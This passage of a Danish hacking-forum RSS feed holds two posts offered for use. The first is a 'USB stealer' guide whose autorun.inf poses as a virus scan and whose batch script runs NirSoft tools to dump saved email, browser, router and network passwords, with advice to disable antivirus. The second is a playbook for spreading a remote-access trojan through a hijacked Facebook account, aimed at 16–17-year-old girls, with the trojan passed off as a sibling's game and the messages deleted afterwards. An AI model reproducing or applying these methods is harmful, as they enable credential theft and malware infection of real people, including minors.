nu ligger du også launch.bat ind i mappen usb drivers, også trykker du på den der hedder lunch.bat.. så kommer der nogle .txt dokomenter hvor det hele står i.<br />
Spørgsmål i tråden tak!<br />
Lycia out.<br />
Ps. Håber det går det er uden billeder da det er så nemt...]]></description>
			<content:encoded><![CDATA[Det her er en guide til at lave en Usb Stealer. (Fandt lige det på et gammel usb stik, og tænkte det vil jeg dele med jer (Y))<br />
Målet er at få et Usb stik man bare stikker ind, også åbner du et batch fil, også har man alle Passwords og de informationer man vælger.<br />
Det man henter er ikke FUD (Fully undetectable) Så det vil sige smider du dit usb stik i, så siger alle med et virus program at der er noget virus, også bliver de slettet<br />
Så man skal enten Selv lave den FUD, ellers så skal man slå virus programet fra på den pågældende computer.<br />
Jeg giver jer en "smagsprøve" på hvad man kan vælge for at få nogle stks. passwords, man kan vælge mellem en masse forskellige ting her: <a href="http://www.nirsoft.net/utils/" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/</a><br />
Efter man har hente følgende ting:<br />
<a href="http://www.nirsoft.net/utils/mspass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/mspass.html</a> - Det er stealern til alle mail programmer.<br />
<a href="http://www.nirsoft.net/utils/mailpv.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/mailpv.html</a> - OGså til mails<br />
<a href="http://www.nirsoft.net/utils/internet_explorer_password.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/internet_ex...sword.html</a> internet explorer Pass stealer<br />
<a href="http://www.nirsoft.net/utils/pspv.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/pspv.html</a> - Alt microsoft pass stealer<br />
<a href="http://www.nirsoft.net/utils/router_password_recovery.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/router_pass...overy.html</a> - Gemte Password på routern<br />
<a href="http://www.nirsoft.net/utils/network_password_recovery.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/network_pas...overy.html</a> Passwords og usernames på netværket<br />
<a href="http://www.nirsoft.net/utils/dialupass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/dialupass.html</a> - Gemte netværks på Computern samt koder til netværket<br />
<a href="http://www.nirsoft.net/utils/passwordfox.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/passwordfox.html</a> - Firefox pass stealer<br />
<a href="http://www.nirsoft.net/utils/chromepass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/chromepass.html</a> - crome<br />
Her er der lidt andre ting i også kan finde: <a href="http://www.nirsoft.net/password_recovery_tools.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/password_recovery_tools.html</a><br />
<br />
Du henter filerne og unpacker dem (husk at slå antivirus programmet på din computer fra) og så lig dem over på dit Usb stik, i en mappe (vi kalder mappen usb drivers)<br />
Nu skal vi så igang med det sjove.<br />
Åbne dit notepad<br />
skriv følgende:<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan</code></div></div>Nu gemmer du så din notepad fil, som autorun.inf (husk at det altså ikke skal være.txt men .inf)<br />
Gem din fil i mappen "usb drivers" Altså den vi lagde de andre filer ind i på usb stikket.<br />
<br />
Når du har gjort det åbner du et nyt notepad dokoment.<br />
skriv følgende:<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>start mspass.exe /stext mspass.txt<br />
start mailpv.exe /stext mailpv.txt<br />
start iepv.exe /stext iepv.txt<br />
start pspv.exe /stext pspv.txt<br />
start passwordfox.exe /stext passwordfox.txt<br />
start routerpassview.exe /stext routerpassview.txt<br />
start netpass.exe /stext netpass.txt<br />
start chromepass.exe /stext chromepass.exe</code></div></div><br />
Så gemmer du den notepad fil som launch.bat igen husk det skal være .bat og ikke .txt<br />
nu ligger du også launch.bat ind i mappen usb drivers, også trykker du på den der hedder lunch.bat.. så kommer der nogle .txt dokomenter hvor det hele står i.<br />
Spørgsmål i tråden tak!<br />
Lycia out.<br />
Ps. Håber det går det er uden billeder da det er så nemt...]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Spredning af RAT via SE]]></title>
			<link>https://www.shellsec.pw/traad-spredning-af-rat-via-se</link>
			<pubDate>Sun, 11 Aug 2013 02:55:09 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-spredning-af-rat-via-se</guid>
			<description><![CDATA[Ved ikke om den hører til her, eller under SE?<br />
<br />
Først skal det siges, at denne metode ikke er afprøvet, det er blot en tanke jeg har fået. <br />
<br />
Ved også godt, det ikke er den mest effektive (nok ikke så stor spredning pr time) - <br />
men ikke desto mindre en anden tilgang end mange af de "klassiske" (youtube film etc.)<br />
<br />
Endvidere er målgruppen unge piger (16-17-år) - min erfaring er, at de ikke er heltså IT-kyndige som drenge (generelt)  -<br />
 men derfra har man jo adgang til hele netværket.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Standard discalimer</span> om, at jeg ikke kan stilles til ansvar hvis nogen prøver at bruge den.<br />
<br />
<blockquote class="mycode_quote"><cite>humle Skrev:</cite>Husk det er ulovligt at hacke andre <br />
og svare til at sparke døren ind i en anden vedkommens lejlighed.</blockquote><br />
<br />
Alt setuppet gider jeg ikke gå i detaljer med, men:<ul class="mycode_list"><li>det kræves du har en RAT der er FUD (ellers skal du i hverfalt bruge noget vild SE)<br />
</li>
<li>det kræves at du har login til en facebook konto (du kan bruge til at sprede fra)<br />
</li>
</ul>
<br />
--- Så går vi i gang ---<br />
 <br />
Først logger man ind på den facebook profil man har adgang til.<br />
<br />
Så skal der findes et "target" - dette findes på vennelisten.<br />
Det er en god ide, lige at lure på hvornår den sidste besked er blevet sendt - <br />
de skal jo helst ikke sidde ved computeren når deres conmputer "pludseligt begynder at skrive ting på facebook"<br />
<br />
Endvidere kan det anbefales, ikke at vælge blandt "farvoritter" (de øverste) - <br />
da der er stor sansynlighed for at de vil snakke om den fil der blev sendt den anden dag.<br />
<br />
Så ned blandt dem, der ikke er så meget kontakt med.<br />
<br />
Så skal der læses lidt:<br />
Det er vigtigt du finder ud af facebook-konto-ejerens skrive stil, med "target".<br />
Dette indebærer:<br />
	- Starthilsen (Hey, Hej, Yo, Wazzap, etc.)<br />
	- brug af stort startbogstav<br />
	- Brug af smileyer, hjerter osv.<br />
Dette er vigtigt for at "target" ikke får mistanke.<br />
<br />
------------------------------------------------------------------------------<br />
- Eksempel på mulig mistanke:<br />
------------------------------------------------------------------------------<br />
- Konto-ejer stil: Hej Søde <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- Mistanke fejl:   Heeey!<br />
-<br />
- Konto-ejer stil: Det er bare knæhøj karse<br />
- Mistanke stil: d r bar cool<br />
-<br />
- Konto-Ejer: Det syns jeg vi skal gøre<br />
- Mistanke stil: Letz do it niggah bro, su'?!<br />
------------------------------------------------------------------------------<br />
<br />
Tabellen kan OGSÅ læses, hvis man bytter fundt på Konto-ejer og Mistanke fejl.<br />
<br />
For at skabe mere credit til kontoen hos "target" er det nødvendigt at snage lidt<br />
mere, før du får i gang:<br />
<br />
Det er en god ting at vide<ul class="mycode_list"><li>Familie navne (bror/søster/far/etc)<br />
</li>
<li>Evt. kæreste (MÅ IKKE BRUGES SOM REFERENCE!)<br />
</li>
<li>Evt. andre venner, man ikke har i samme netværk*<br />
</li>
</ul>
<br />
Så er vi ved at være klar. Find target og begynd i den rigtige stil!<br />
<br />
En starthilsen kunne være:<br />
------------------------------------------------------------------------------------<br />
- Eksempel på starthilsen<br />
------------------------------------------------------------------------------------<br />
- Konto (1): Pige, 16 år, stx, sønderjylland, bror "Anders", ikke-fælles-ven Anders<br />
- Target(2): Pige 17 år, ikke en der er blevet skrevet til i laang tid<br />
------------------------------------------------------------------------------------<br />
- (1): Hey! Har du tid at hjælpe?<br />
- (2): Ja, hva så? <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (1): Har fået det her spil, af Anders //NOTE: Bror<br />
- (1): Men det vil ikk køre på min computer<br />
- (1): Kan jeg få dig til at se, om det kan køre på din?<br />
- (2): Hvilket spil?<br />
- (1): Det er noget han selv har lavet, skal lige se det <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /> //NOTE: God at få med!!!<br />
- (2): Ok. Hvad hedder det? <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (1): Final5 //NOTE: RAT-navn, skal gerne være legit spilnavn<br />
- (1): Det kan hentes her [link til fil]<br />
- ---<br />
- ---<br />
- (2): Den siger bare fejl her<br />
- (1): Det gør den også ved mig <img src="https://www.shellsec.pw/images/smilies/facebook/sad.png" alt="Sad" title="Sad" class="smilie smilie_71" /><br />
- (1): Men mange tak for hjælpen <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (2): Så lidt <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
------------------------------------------------------------------------------------<br />
Derefter skal beskeden slettes. Dette foregår under <br />
"Beskeder" (Duh!). Her markeres tråden man ønsker slette, og under "Actions" vælges "Delete conversation" (tak til DoctorBue). Dette gøres så kontoejer ikke får mistanke.<br />
<br />
Har du gjort dit arbejde godt nok, har du nu en ny konto du kan suge facebook login - <br />
rince and repear.<br />
<br />
-------------------------------------------------------------------------------------<br />
<br />
<br />
... Senere: Flere eksmepler + stavekontrol!<br />
<br />
<br />
<br />
<br />
*) Bonus: Sjovt tool til at se dit netværk <a href="http://wolframalpha.com/facebook" target="_blank" rel="noopener" class="mycode_url">http://wolframalpha.com/facebook</a>]]></description>
			<content:encoded><![CDATA[Ved ikke om den hører til her, eller under SE?<br />
<br />
Først skal det siges, at denne metode ikke er afprøvet, det er blot en tanke jeg har fået. <br />
<br />
Ved også godt, det ikke er den mest effektive (nok ikke så stor spredning pr time) - <br />
men ikke desto mindre en anden tilgang end mange af de "klassiske" (youtube film etc.)<br />
<br />
Endvidere er målgruppen unge piger (16-17-år) - min erfaring er, at de ikke er heltså IT-kyndige som drenge (generelt)  -<br />
 men derfra har man jo adgang til hele netværket.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Standard discalimer</span> om, at jeg ikke kan stilles til ansvar hvis nogen prøver at bruge den.<br />
<br />
<blockquote class="mycode_quote"><cite>humle Skrev:</cite>Husk det er ulovligt at hacke andre <br />
og svare til at sparke døren ind i en anden vedkommens lejlighed.</blockquote><br />
<br />
Alt setuppet gider jeg ikke gå i detaljer med, men:<ul class="mycode_list"><li>det kræves du har en RAT der er FUD (ellers skal du i hverfalt bruge noget vild SE)<br />
</li>
<li>det kræves at du har login til en facebook konto (du kan bruge til at sprede fra)<br />
</li>
</ul>
<br />
--- Så går vi i gang ---<br />
 <br />
Først logger man ind på den facebook profil man har adgang til.<br />
<br />
Så skal der findes et "target" - dette findes på vennelisten.<br />
Det er en god ide, lige at lure på hvornår den sidste besked er blevet sendt - <br />
de skal jo helst ikke sidde ved computeren når deres conmputer "pludseligt begynder at skrive ting på facebook"<br />
<br />
Endvidere kan det anbefales, ikke at vælge blandt "farvoritter" (de øverste) - <br />
da der er stor sansynlighed for at de vil snakke om den fil der blev sendt den anden dag.<br />
<br />
Så ned blandt dem, der ikke er så meget kontakt med.<br />
<br />
Så skal der læses lidt:<br />
Det er vigtigt du finder ud af facebook-konto-ejerens skrive stil, med "target".<br />
Dette indebærer:<br />
	- Starthilsen (Hey, Hej, Yo, Wazzap, etc.)<br />
	- brug af stort startbogstav<br />
	- Brug af smileyer, hjerter osv.<br />
Dette er vigtigt for at "target" ikke får mistanke.<br />
<br />
------------------------------------------------------------------------------<br />
- Eksempel på mulig mistanke:<br />
------------------------------------------------------------------------------<br />
- Konto-ejer stil: Hej Søde <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- Mistanke fejl:   Heeey!<br />
-<br />
- Konto-ejer stil: Det er bare knæhøj karse<br />
- Mistanke stil: d r bar cool<br />
-<br />
- Konto-Ejer: Det syns jeg vi skal gøre<br />
- Mistanke stil: Letz do it niggah bro, su'?!<br />
------------------------------------------------------------------------------<br />
<br />
Tabellen kan OGSÅ læses, hvis man bytter fundt på Konto-ejer og Mistanke fejl.<br />
<br />
For at skabe mere credit til kontoen hos "target" er det nødvendigt at snage lidt<br />
mere, før du får i gang:<br />
<br />
Det er en god ting at vide<ul class="mycode_list"><li>Familie navne (bror/søster/far/etc)<br />
</li>
<li>Evt. kæreste (MÅ IKKE BRUGES SOM REFERENCE!)<br />
</li>
<li>Evt. andre venner, man ikke har i samme netværk*<br />
</li>
</ul>
<br />
Så er vi ved at være klar. Find target og begynd i den rigtige stil!<br />
<br />
En starthilsen kunne være:<br />
------------------------------------------------------------------------------------<br />
- Eksempel på starthilsen<br />
------------------------------------------------------------------------------------<br />
- Konto (1): Pige, 16 år, stx, sønderjylland, bror "Anders", ikke-fælles-ven Anders<br />
- Target(2): Pige 17 år, ikke en der er blevet skrevet til i laang tid<br />
------------------------------------------------------------------------------------<br />
- (1): Hey! Har du tid at hjælpe?<br />
- (2): Ja, hva så? <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (1): Har fået det her spil, af Anders //NOTE: Bror<br />
- (1): Men det vil ikk køre på min computer<br />
- (1): Kan jeg få dig til at se, om det kan køre på din?<br />
- (2): Hvilket spil?<br />
- (1): Det er noget han selv har lavet, skal lige se det <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /> //NOTE: God at få med!!!<br />
- (2): Ok. Hvad hedder det? <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (1): Final5 //NOTE: RAT-navn, skal gerne være legit spilnavn<br />
- (1): Det kan hentes her [link til fil]<br />
- ---<br />
- ---<br />
- (2): Den siger bare fejl her<br />
- (1): Det gør den også ved mig <img src="https://www.shellsec.pw/images/smilies/facebook/sad.png" alt="Sad" title="Sad" class="smilie smilie_71" /><br />
- (1): Men mange tak for hjælpen <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
- (2): Så lidt <img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
------------------------------------------------------------------------------------<br />
Derefter skal beskeden slettes. Dette foregår under <br />
"Beskeder" (Duh!). Her markeres tråden man ønsker slette, og under "Actions" vælges "Delete conversation" (tak til DoctorBue). Dette gøres så kontoejer ikke får mistanke.<br />
<br />
Har du gjort dit arbejde godt nok, har du nu en ny konto du kan suge facebook login - <br />
rince and repear.<br />
<br />
-------------------------------------------------------------------------------------<br />
<br />
<br />
... Senere: Flere eksmepler + stavekontrol!<br />
<br />
<br />
<br />
<br />
*) Bonus: Sjovt tool til at se dit netværk <a href="http://wolframalpha.com/facebook" target="_blank" rel="noopener" class="mycode_url">http://wolframalpha.com/facebook</a>]]></content:encoded>
		</item>
	</channel>
</rss>